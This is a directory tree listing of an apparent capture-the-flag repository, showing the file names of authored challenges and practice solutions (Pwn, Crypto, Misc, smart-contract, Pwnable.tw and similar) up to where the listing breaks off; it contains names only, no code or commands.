├── MyChallenges ├── Crypto │ └── Cute_Baby_Cats │ │ ├── Desc │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── myErrors.py │ │ │ ├── run.sh │ │ │ ├── secret.py │ │ │ ├── server.py │ │ │ └── userClass.py │ │ └── xinetd │ │ └── sol.py ├── Misc │ ├── Excellent_M30W_Store │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── Wishlist.xlsx │ │ │ │ ├── run.sh │ │ │ │ ├── secret.py │ │ │ │ └── server.py │ │ │ └── xinetd │ │ └── sol.py │ └── Matrix │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── chal.py │ │ │ ├── config.py │ │ │ └── run.sh │ │ └── xinetd │ │ └── solution │ │ └── solve.py ├── Pwn │ ├── ASTRAL │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Nebula │ │ │ │ └── distribute.diff │ │ │ ├── Neutron │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ ├── hypervisor │ │ │ │ │ ├── kernel │ │ │ │ │ └── processor │ │ │ ├── Protostar │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ └── processor │ │ │ ├── Redgiant │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ ├── hypervisor │ │ │ │ │ └── processor │ │ │ ├── StarryNight │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── init │ │ │ │ ├── share │ │ │ │ │ ├── astralNebula │ │ │ │ │ ├── astralNeutron │ │ │ │ │ ├── astralProtostar │ │ │ │ │ ├── astralRedgiant │ │ │ │ │ ├── astralStarryNight │ │ │ │ │ ├── astralSupernova │ │ │ │ │ ├── hypervisor │ │ │ │ │ ├── kernel │ │ │ │ │ ├── processor │ │ │ │ │ ├── run.sh │ │ │ │ │ └── user │ │ │ │ └── xinetd │ │ │ └── Supernova │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ ├── hypervisor │ │ │ │ ├── processor │ │ │ │ └── user │ │ ├── exploit │ │ │ ├── exploitNebula │ │ │ │ ├── exp_applet.aa │ │ │ │ ├── exp_applet.py │ │ │ │ ├── genNonceTemplate.py │ │ │ │ └── searchNonce.c │ │ │ ├── exploitNeutron │ │ │ │ └── exp_hypervisor.py │ │ │ ├── exploitProtostar │ │ │ │ ├── 
exp_processor.aa │ │ │ │ └── exp_processor.py │ │ │ ├── exploitRedgiant │ │ │ │ └── exp_user.py │ │ │ ├── exploitStarryNight │ │ │ │ ├── exp_applet.aa │ │ │ │ ├── exp_applet.py │ │ │ │ ├── exp_hypervisor.py │ │ │ │ ├── exp_kernel.py │ │ │ │ ├── exp_processor.aa │ │ │ │ ├── exp_processor.py │ │ │ │ ├── exp_user.aa │ │ │ │ ├── exp_user.py │ │ │ │ ├── genNonceTemplate.py │ │ │ │ └── searchNonce.c │ │ │ └── exploitSupernova │ │ │ │ └── exp_kernel.py │ │ └── sourcecode │ │ │ ├── Nebula │ │ │ └── sourcecode.diff │ │ │ ├── Neutron │ │ │ └── sourcecode.diff │ │ │ ├── Protostar │ │ │ └── sourcecode.diff │ │ │ ├── Redgiant │ │ │ └── sourcecode.diff │ │ │ ├── StarryNight │ │ │ ├── APPLET │ │ │ │ ├── DATASHEET │ │ │ │ ├── SIGNATURES │ │ │ │ ├── assembler.py │ │ │ │ ├── escrow.aa │ │ │ │ ├── escrow.ab │ │ │ │ ├── interpreter.py │ │ │ │ ├── lottery.aa │ │ │ │ └── lottery.ab │ │ │ ├── APPLET_PROCESSOR │ │ │ │ ├── applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── device.c │ │ │ │ ├── device.h │ │ │ │ ├── jit.c │ │ │ │ ├── jit.h │ │ │ │ ├── processor.c │ │ │ │ ├── processor.h │ │ │ │ ├── sandbox.c │ │ │ │ ├── sandbox.h │ │ │ │ ├── snapshot.h │ │ │ │ ├── util.c │ │ │ │ └── util.h │ │ │ ├── HYPERVISOR │ │ │ │ ├── applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── const.h │ │ │ │ ├── device.c │ │ │ │ ├── device.h │ │ │ │ ├── elf.h │ │ │ │ ├── hypercall.c │ │ │ │ ├── hypercall.h │ │ │ │ ├── hypervisor.c │ │ │ │ ├── hypervisor.h │ │ │ │ ├── interrupt.c │ │ │ │ ├── interrupt.h │ │ │ │ ├── util.c │ │ │ │ ├── util.h │ │ │ │ └── vm.h │ │ │ ├── KERNEL │ │ │ │ ├── applet.c │ │ │ │ ├── applet.h │ │ │ │ ├── appletStructs.h │ │ │ │ ├── build.sh │ │ │ │ ├── const.h │ │ │ │ ├── elf.c │ │ │ │ ├── elf.h │ │ │ │ ├── entry.S │ │ │ │ ├── hypercall.c │ │ │ │ ├── hypercall.h │ │ │ │ ├── interruptEntry.S │ │ │ │ ├── kernel.c │ │ │ │ ├── kernel.h │ │ │ │ ├── memory.c │ │ │ │ ├── memory.h │ │ │ │ ├── panic.S │ │ │ │ ├── panic.h │ │ │ │ ├── syscall.S │ │ │ │ ├── syscall.c │ │ │ │ └── syscall.h │ │ │ ├── USER │ │ │ │ ├── 
applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── entry.S │ │ │ │ ├── lib.c │ │ │ │ ├── lib.h │ │ │ │ ├── syscall.c │ │ │ │ ├── syscall.h │ │ │ │ ├── user.c │ │ │ │ └── user.h │ │ │ └── gensig.py │ │ │ └── Supernova │ │ │ └── sourcecode.diff │ ├── Babyheap │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── babyheap │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── babyheap.c │ ├── Babynote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── babynote │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── babynote.c │ ├── Bookstore │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── bookstore │ │ ├── bookstore.c │ │ ├── exp.py │ │ └── flag │ ├── Childnote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── childnote │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── childnote.c │ ├── Cobolstrike │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── archive │ │ │ │ │ └── NOTE │ │ │ │ ├── cobolstrike │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── cobolstrike.cbl │ ├── Diary │ │ ├── Desc │ │ ├── Diary_writeup.key │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── diary │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── diary.c │ ├── EDUshell │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── EDUshell │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── EDUshell.c │ │ │ └── Makefile │ ├── 
ElfFortress │ │ ├── Desc │ │ ├── distribute │ │ │ ├── DISTNOTE │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── bzImage │ │ │ │ ├── initramfs.cpio │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── sandbox.c │ ├── Formatfree │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── formatfree │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── formatfree.c │ ├── Grocery_Shop │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── grocery_shop │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── grocery_shop.c │ ├── Guardian │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── init │ │ │ ├── share │ │ │ │ ├── challenge │ │ │ │ │ ├── Dockerfile │ │ │ │ │ ├── docker-compose.yml │ │ │ │ │ └── share │ │ │ │ │ │ ├── flag │ │ │ │ │ │ ├── guardian.conf │ │ │ │ │ │ ├── ld.so.preload │ │ │ │ │ │ └── libguardian.so │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ └── genlibexp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── guardian.c │ │ │ ├── guardian.h │ │ │ ├── pathlib.c │ │ │ ├── pathlib.h │ │ │ ├── util.c │ │ │ └── util.h │ ├── HelloWorld │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── helloworld │ │ └── helloworld.c │ ├── House_of_Cats │ │ ├── Desc │ │ ├── House_of_Cats.key │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── house_of_cats │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ ├── exp.sh │ │ │ ├── exp_Arch.py │ │ │ ├── exp_complete.py │ │ │ ├── exp_complex.py │ │ │ ├── exp_fast.py │ │ │ ├── exp_final.py │ │ │ └── exp_magic.py │ │ └── sourcecode │ 
│ │ ├── Makefile │ │ │ ├── development │ │ │ ├── house_of_cats │ │ │ ├── house_of_cats.c │ │ │ ├── house_of_cats_armoured │ │ │ ├── house_of_cats_noprintf │ │ │ ├── house_of_cats_noprintf.c │ │ │ └── note │ │ │ └── house_of_cats_armoured.c │ ├── Illusion │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── illusion │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── illusion.c │ │ │ └── illusion.py │ ├── Oldnote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── ld-2.26.so │ │ │ ├── libc-2.26.so │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── oldnote │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── oldnote.c │ ├── Robot │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── robot │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── robot.c │ ├── STACK │ │ ├── Desc │ │ ├── README.md │ │ ├── STACK.key │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── stack │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ └── exp_fast.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── STACK_armoured.c │ │ │ └── development │ │ │ ├── STACK │ │ │ ├── STACK.c │ │ │ ├── STACK_armoured │ │ │ └── STACK_armoured.c │ ├── Secret_Keeper2 │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── secret_keeper_v2 │ │ └── secret_keeper_v2.c │ ├── Sentinel │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── .dockerignore │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── challengeBin │ │ │ │ ├── sentinel │ │ │ │ └── sentinelRevenge │ │ │ ├── challengeFlag │ │ │ │ ├── fakeFlag │ │ │ │ ├── flag │ │ │ │ └── flagRevenge │ │ │ ├── docker-compose.yml │ │ │ ├── init │ │ │ ├── 
reset.sh │ │ │ ├── share │ │ │ │ ├── instanceManager.py │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── Makefile │ │ │ ├── exp.c │ │ │ └── exp.py │ │ ├── healthcheck.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── sentinel.c │ │ │ └── source.diff │ ├── Survey │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── survey │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── survey.c │ ├── TeachingLabs │ │ ├── GOTlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── GOTlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── GOTlab.c │ │ │ │ └── Makefile │ │ ├── ROPlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── ROPlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── ROPlab.c │ │ ├── fastbinlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── fastbinlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── fastbinlab.c │ │ ├── fmtlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── fmtlab │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── fmtlab.c │ │ ├── shelllab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── run.sh │ │ │ │ │ └── shelllab │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── shelllab.c │ │ ├── stashlab │ │ │ ├── 
Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── run.sh │ │ │ │ │ └── stashlab │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── stashlab.c │ │ └── tcachelab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── tcachelab │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── tcachelab.c │ ├── Treat │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── treat │ │ └── treat.c │ ├── Unicorns_Aisle │ │ ├── Desc │ │ ├── README.md │ │ ├── UnicornsAisle.pdf │ │ ├── distribute │ │ │ ├── DISTNOTE │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── libunicorn.so.1 │ │ │ ├── share │ │ │ │ ├── encounter.emu │ │ │ │ ├── run.sh │ │ │ │ ├── unicornInterlude │ │ │ │ ├── unicornPostlude │ │ │ │ ├── unicornPrelude │ │ │ │ └── unicornsAisle │ │ │ └── xinetd │ │ ├── exp_postlude.py │ │ └── sourcecode │ │ │ └── Server │ │ │ ├── build.sh │ │ │ ├── encounter.S │ │ │ ├── guestcontext.h │ │ │ ├── handler.c │ │ │ ├── handler.h │ │ │ ├── main.c │ │ │ ├── main.h │ │ │ ├── mem.c │ │ │ ├── mem.h │ │ │ ├── run.sh │ │ │ ├── ucutils.c │ │ │ ├── ucutils.h │ │ │ ├── utils.c │ │ │ └── utils.h │ ├── Variable_Machine_Revenge │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── variable_machine_revenge │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── includes │ │ │ ├── gc.h │ │ │ ├── variables.h │ │ │ └── vm.h │ │ │ ├── source.diff │ │ │ └── src │ │ │ ├── Makefile │ │ │ ├── gc.c │ │ │ ├── main.c │ │ │ └── vm.c │ └── Wheel_of_Fortune │ │ ├── Desc │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── flag │ │ │ ├── run.sh │ │ │ └── wheel_of_fortune │ │ └── xinetd │ │ ├── exp.py │ │ └── 
sourcecode │ │ ├── Makefile │ │ └── wheel_of_fortune.c └── SmartContract │ └── Draupnir │ ├── Desc │ ├── Draupnir.pdf │ ├── README.md │ ├── contracts │ ├── Setup.sol │ └── weth9.sol │ ├── distribute │ ├── Dockerfile │ ├── docker-compose.yml │ ├── requirements.txt │ └── share │ │ ├── chal.py │ │ ├── compiled.bin │ │ ├── entrypoint.sh │ │ ├── eth_sandbox │ │ ├── __init__.py │ │ ├── auth.py │ │ ├── launcher.py │ │ └── server.py │ │ ├── handler.sh │ │ └── startup │ │ ├── 00-create-xinetd-service │ │ ├── 98-start-gunicorn │ │ └── 99-start-xinetd │ └── solution │ ├── exp.py │ ├── exp.sh │ └── exp.sol ├── Practice ├── CTFS.me │ ├── binary_exploitation │ │ ├── faile.py │ │ ├── namelist.py │ │ ├── obstacle.py │ │ ├── secret.py │ │ ├── soeltanbank.py │ │ ├── story.py │ │ └── thoughtfuldecision.py │ ├── cryptography │ │ └── as_beautiful_as_ruby.py │ ├── reverse │ │ ├── balikin.py │ │ ├── privateroom.py │ │ ├── rennai.py │ │ ├── resqua.py │ │ ├── reverseme1.py │ │ ├── reverseme1.txt │ │ └── rvrsmz64.py │ └── web_exploitation │ │ ├── Baby_RCE_1.txt │ │ ├── Baby_RCE_2.txt │ │ └── Blue_Eyes_White_Dragon.txt ├── Eonew.cn │ ├── Black_Hole │ │ ├── black_hole │ │ └── exp.py │ ├── Blockade │ │ ├── blockade │ │ └── exp.py │ ├── Car_Store │ │ ├── car_store │ │ ├── car_store.cpp │ │ └── exp.py │ ├── Easy_ASAN │ │ ├── easy_asan │ │ └── exp.py │ ├── Easy_Printf │ │ ├── easy_printf │ │ └── exp.py │ ├── Easy_Stack │ │ ├── easy_stack │ │ └── exp.py │ ├── Fog │ │ ├── exp.py │ │ └── fog │ ├── HTTP_Server │ │ ├── exp.py │ │ └── server │ ├── House_of_Storm │ │ ├── exp.py │ │ └── house_of_storm │ ├── Kernel_Pwn1 │ │ ├── exp.c │ │ └── test1.ko │ ├── Kernel_Pwn2 │ │ ├── exp.c │ │ └── test2.ko │ ├── Link_List │ │ ├── exp.py │ │ └── link_list │ ├── Login │ │ ├── exp.py │ │ └── login │ ├── Mimic_Heap │ │ ├── exp.py │ │ ├── mimic │ │ └── mimic_heap │ ├── Mimic_Stack │ │ ├── mimic │ │ ├── mimic_stack_x64 │ │ └── mimic_stack_x86 │ ├── Mountain │ │ ├── exp.py │ │ └── mountain │ ├── No_Leak │ │ ├── exp.py │ 
│ └── no_leak │ ├── Shellcode │ │ ├── exp.py │ │ └── shellcode │ ├── Squid │ │ └── exp.py │ ├── Time_Heap │ │ ├── exp.py │ │ └── time_heap │ └── Truncate_String │ │ ├── exp.py │ │ └── truncate_string ├── MicroCorruption │ ├── Challenge_ROMS │ │ ├── Addis_Ababa.zip │ │ ├── Algiers.zip │ │ ├── Bangalore.zip │ │ ├── Chernobyl.zip │ │ ├── Cusco.zip │ │ ├── Hanoi.zip │ │ ├── Hollywood.zip │ │ ├── Jakarta.zip │ │ ├── Johannesburg.zip │ │ ├── Lagos.zip │ │ ├── Montevideo.zip │ │ ├── New_Orleans.zip │ │ ├── Novosibirsk.zip │ │ ├── Reykjavik.zip │ │ ├── Santa_Cruz.zip │ │ ├── Sydney.zip │ │ ├── Tutorial.zip │ │ ├── Vladivostok.zip │ │ └── Whitehorse.zip │ ├── LockITProManual.pdf │ ├── MSP430Reference.pdf │ └── Solutions ├── Pwnable.kr │ ├── Grotesque │ │ ├── cmd3 │ │ └── coin2 │ │ │ ├── coin2 │ │ │ └── exp.py │ ├── Rookie │ │ ├── alloca │ │ │ ├── alloca │ │ │ └── exp.py │ │ ├── ascii_easy │ │ │ ├── ascii_easy │ │ │ └── exp.py │ │ ├── brain_fuck │ │ │ ├── bf │ │ │ └── exp.py │ │ ├── crypto1 │ │ │ ├── client.py │ │ │ ├── exp.py │ │ │ └── server.py │ │ ├── dragon │ │ │ ├── dragon │ │ │ └── exp.py │ │ ├── echo1 │ │ │ ├── echo1 │ │ │ └── exp.py │ │ ├── echo2 │ │ │ ├── echo2 │ │ │ └── exp.py │ │ ├── fix │ │ │ ├── exp.py │ │ │ └── fix │ │ ├── fsb │ │ │ ├── exp.py │ │ │ └── fsb │ │ ├── loveletter │ │ │ ├── exp.py │ │ │ └── loveletter │ │ ├── md5_calculator │ │ │ ├── exp.py │ │ │ ├── genrand.c │ │ │ └── md5_calculator │ │ ├── note │ │ │ ├── exp.py │ │ │ └── note │ │ ├── otp │ │ │ ├── exp │ │ │ └── otp.c │ │ ├── rsa_calculator │ │ │ ├── exp.py │ │ │ └── rsa_calculator │ │ ├── simple_login │ │ │ ├── exp.py │ │ │ └── simple_login │ │ ├── syscall │ │ │ ├── exp.c │ │ │ └── syscall.c │ │ └── tiny_easy │ │ │ ├── exp.py │ │ │ └── tiny_easy │ ├── Secret │ │ ├── Exploitable │ │ │ ├── exp.py │ │ │ └── exploitable │ │ ├── Malware │ │ │ ├── exp.py │ │ │ └── malware.py │ │ └── Unexploitable │ │ │ ├── exp.py │ │ │ └── unexploitable │ └── Toddler │ │ ├── asm │ │ ├── asm.c │ │ └── exp.py │ │ ├── 
blackjack │ │ ├── blackjack.c │ │ └── exp │ │ ├── blukat │ │ ├── bof │ │ ├── bof │ │ └── exp.py │ │ ├── cmd1 │ │ ├── cmd1.c │ │ └── exp │ │ ├── cmd2 │ │ ├── cmd2.c │ │ └── exp │ │ ├── coin │ │ ├── coin │ │ └── exp.py │ │ ├── collision │ │ ├── collision.c │ │ └── exp │ │ ├── fd │ │ ├── exp │ │ └── fd.c │ │ ├── flag │ │ ├── exp │ │ └── flag │ │ ├── horcruxes │ │ ├── exp.py │ │ └── horcruxes │ │ ├── input │ │ ├── exp.c │ │ └── input.c │ │ ├── leg │ │ ├── exp │ │ └── leg.asm │ │ ├── lotto │ │ ├── exp │ │ └── lotto.c │ │ ├── memcpy │ │ ├── exp │ │ └── memcpy.c │ │ ├── mistake │ │ ├── exp │ │ └── mistake.c │ │ ├── passcode │ │ ├── exp │ │ └── passcode │ │ ├── random │ │ ├── exp │ │ └── random.c │ │ ├── shellshock │ │ ├── exp │ │ └── shellshock.c │ │ ├── uaf │ │ ├── exp │ │ └── uaf │ │ └── unlink │ │ ├── exp.py │ │ └── unlink ├── Pwnable.tw │ ├── 3x17 │ │ ├── 3x17 │ │ └── exp.py │ ├── alive_note │ │ ├── alive_note │ │ └── exp.py │ ├── applestore │ │ ├── applestore │ │ └── exp.py │ ├── babyallocator │ │ ├── babyallocator │ │ ├── exp.py │ │ └── exp_makes_sense.py │ ├── babystack │ │ ├── babystack │ │ └── exp.py │ ├── bash │ │ ├── bash │ │ │ └── exp.py │ │ ├── bash_revenge │ │ │ └── exp.py │ │ └── prob │ │ │ └── bash_revenge.tgz │ ├── bookwriter │ │ ├── bookwriter │ │ └── exp.py │ ├── bounty_program_alpha │ │ ├── bounty_program │ │ ├── exp.py │ │ └── wrapper │ ├── bounty_program_beta │ │ ├── bounty_program │ │ ├── exp.py │ │ └── wrapper │ ├── breakout │ │ ├── breakout │ │ ├── exp.py │ │ └── prisoner │ ├── calc │ │ ├── calc │ │ └── exp.py │ ├── caov │ │ ├── caov │ │ ├── caov.cpp │ │ └── exp.py │ ├── critical_heap │ │ ├── critical_heap++ │ │ │ ├── exp.py │ │ │ └── leakenv.py │ │ ├── critical_heap │ │ │ └── exp.py │ │ └── prob │ │ │ └── critical_heap │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ ├── critical_heap │ │ │ └── run.sh │ │ │ └── xinetd │ ├── deaslr │ │ ├── deaslr │ │ └── exp.py │ ├── death_note │ │ ├── death_note │ │ └── exp.py │ ├── digimon 
│ │ ├── digimon │ │ ├── exp.py │ │ └── img │ │ │ ├── 50216mon │ │ │ ├── Agumon │ │ │ ├── Angemon │ │ │ ├── Angewomon │ │ │ ├── Angrymon │ │ │ ├── Armadillomon │ │ │ ├── Birdramon │ │ │ ├── Devimon │ │ │ ├── Digitamamon │ │ │ ├── Etemon │ │ │ ├── Gabumon │ │ │ ├── Garudamon │ │ │ ├── Garurumon │ │ │ ├── Gatomon │ │ │ ├── Gomamon │ │ │ ├── Greymon │ │ │ ├── Hawkmon │ │ │ ├── HerakleKabuterimon │ │ │ ├── Hououmon │ │ │ ├── Ikkakumon │ │ │ ├── Impmon │ │ │ ├── Kabuterimon │ │ │ ├── Kuwagamon │ │ │ ├── Leomon │ │ │ ├── Lillymon │ │ │ ├── Lopmon │ │ │ ├── MagnaAngemon │ │ │ ├── Magnadramon │ │ │ ├── MegaKabuterimon │ │ │ ├── Meramon │ │ │ ├── MetalGarurumon │ │ │ ├── MetalGreymon │ │ │ ├── Meteormon │ │ │ ├── Monzaemon │ │ │ ├── Myotismon │ │ │ ├── Numemon │ │ │ ├── Orangemon │ │ │ ├── Palmon │ │ │ ├── Patamon │ │ │ ├── Piximon │ │ │ ├── Piyomon │ │ │ ├── Plesiomon │ │ │ ├── Renamon │ │ │ ├── Rosemon │ │ │ ├── Seadramon │ │ │ ├── Seraphimon │ │ │ ├── SkullGreymon │ │ │ ├── Starmon │ │ │ ├── Tentomon │ │ │ ├── Terriermon │ │ │ ├── Togemon │ │ │ ├── Toolmon │ │ │ ├── Veemon │ │ │ ├── WarGreymon │ │ │ ├── WereGarurumon │ │ │ ├── Whamon │ │ │ ├── Woodmon │ │ │ ├── Wormmon │ │ │ └── Zudomon │ ├── dubblesort │ │ ├── dubblesort │ │ └── exp.py │ ├── food_store │ │ ├── exp.py │ │ └── food_store │ ├── ghostparty │ │ ├── exp.py │ │ ├── ghostparty │ │ └── ghostparty.cpp │ ├── hacknote │ │ ├── exp.py │ │ └── hacknote │ ├── heap_paradise │ │ ├── exp.py │ │ └── heap_paradise │ ├── kidding │ │ ├── exp.py │ │ └── kidding │ ├── mno2 │ │ ├── exp.py │ │ └── mno2 │ ├── omegago │ │ ├── exp.py │ │ └── omegago │ ├── orw │ │ ├── exp.py │ │ └── orw │ ├── printable │ │ ├── exp.py │ │ └── printable │ ├── re-alloc │ │ ├── exp.py │ │ └── re-alloc │ ├── re-alloc_revenge │ │ ├── exp.py │ │ └── re-alloc_revenge │ ├── seccomp_tools │ │ ├── allow_orw.bpf │ │ ├── exp.py │ │ ├── forbid_execve.bpf │ │ ├── kill_all.bpf │ │ └── seccomp-tools │ ├── secret_of_my_heart │ │ ├── exp.py │ │ └── secret_of_my_heart │ 
